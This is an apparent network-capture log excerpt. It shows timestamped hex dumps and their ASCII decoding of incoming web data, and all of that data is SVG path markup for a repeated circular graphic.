                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5296INData Raw: 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 31 33 2c 31 38 34 2e 38 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                  Data Ascii: 3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"></path><path class="cls-9" d="M331.13,184.83a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5312INData Raw: 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 36 2e 36 39 2c 32 36 34 2e 34 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                  Data Ascii: 67,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9" d="M366.69,264.49a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5328INData Raw: 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2c 33 33 36 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32
                                                                                                                                                                                                                                                  Data Ascii: ,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M402,336.08a2,2,0,0,1-.9,2.6,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5344INData Raw: 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61
                                                                                                                                                                                                                                                  Data Ascii: -3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><pa
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5360INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2c 32 36 31 2e 34 34 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c
                                                                                                                                                                                                                                                  Data Ascii: "></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M457,261.44a2,2,0,0,1-.91,2.6,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5376INData Raw: 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 32 35 2c 33 33 33 61 32 2c 32 2c 30 2c 30
                                                                                                                                                                                                                                                  Data Ascii: ,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M492.25,333a2,2,0,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5392INData Raw: 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                  Data Ascii: 2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5408INData Raw: 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 32 34 2c 32 35 38 2e 33 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38
                                                                                                                                                                                                                                                  Data Ascii: 33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.24,258.38a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5424INData Raw: 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                  Data Ascii: 0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5440INData Raw: 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: 38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5456INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 34 38 2c 38 38 2e 37 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c
                                                                                                                                                                                                                                                  Data Ascii: .67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.48,88.71a1.6,1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5472INData Raw: 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 39 2e 38 2c 31 34 36 2e 31 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M389.8,146.16a1.61,1.61,0,0,1-.73,
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5488INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 33
                                                                                                                                                                                                                                                  Data Ascii: .24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.3
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5504INData Raw: 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                  Data Ascii: 34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2,0,0,1,.15,2.68"></path><
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5520INData Raw: 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c 31 34 33 2e 37 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: ,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,143.71a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5536INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 37 2e 38 34 2c 31 39 2e 38 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: s-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M477.84,19.88a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:11 UTC5552INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 31 35 2c 37 37 2e 33 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38
                                                                                                                                                                                                                                                  Data Ascii: .67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M506.15,77.33a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88
